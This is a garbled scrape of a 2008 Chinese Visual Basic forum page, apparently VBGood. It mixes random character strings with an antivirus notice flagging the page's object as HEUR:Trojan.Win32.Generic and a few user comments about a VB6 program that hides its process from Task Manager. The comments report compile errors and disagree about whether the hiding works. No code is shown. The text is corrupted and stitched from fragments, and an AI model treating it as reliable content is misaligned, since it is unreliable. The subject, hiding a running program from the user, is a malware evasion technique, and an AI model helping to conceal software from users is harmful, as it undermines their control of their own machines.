OP2rwA%o0`1_发生下列错误:blog.vbgood.comV$Ahn+Z0DrW

x5A A(pW-G$?A1h6X请求的对象被感染,发现下列病毒 HEUR:Trojan.Win32.Generic
pxK}%fN5C(^Fx?L1py$EL(h

u%X2\(O:F,R:}$~I
如有疑问,请联系您的技术支持 h ]8a mCPVe g!KC5v
创建日期:
+\O3D/d"i\egVBGood社区门户Sun Dec 28 11:13:51 2008
TG
_sEu
Kaspersky Lab
guanzlk发布于2008-12-28 11:08:17
Microsoft Visual Basic 6.0 中文版调试: Message As Msg用户类型未定义;REG_SZ变量未定义;RegSetValueEx子程序或函数未定义。。。,楼主用的是哪个版本的VB?
魔灵圣域之VB世界 icecept 发布于2008-11-03 12:41:31
在任务管理器中看不到应用程序和进程

1.jpg

1.jpg

2.jpg

2.jpg

魔灵圣域之VB世界 icecept 发布于2008-11-03 12:35:58
在我这里看不到进程啊
gujin162发布于2008-11-01 17:51:12
进程隐藏好像无效啊
我来说两句

(可选)

Open Toolbar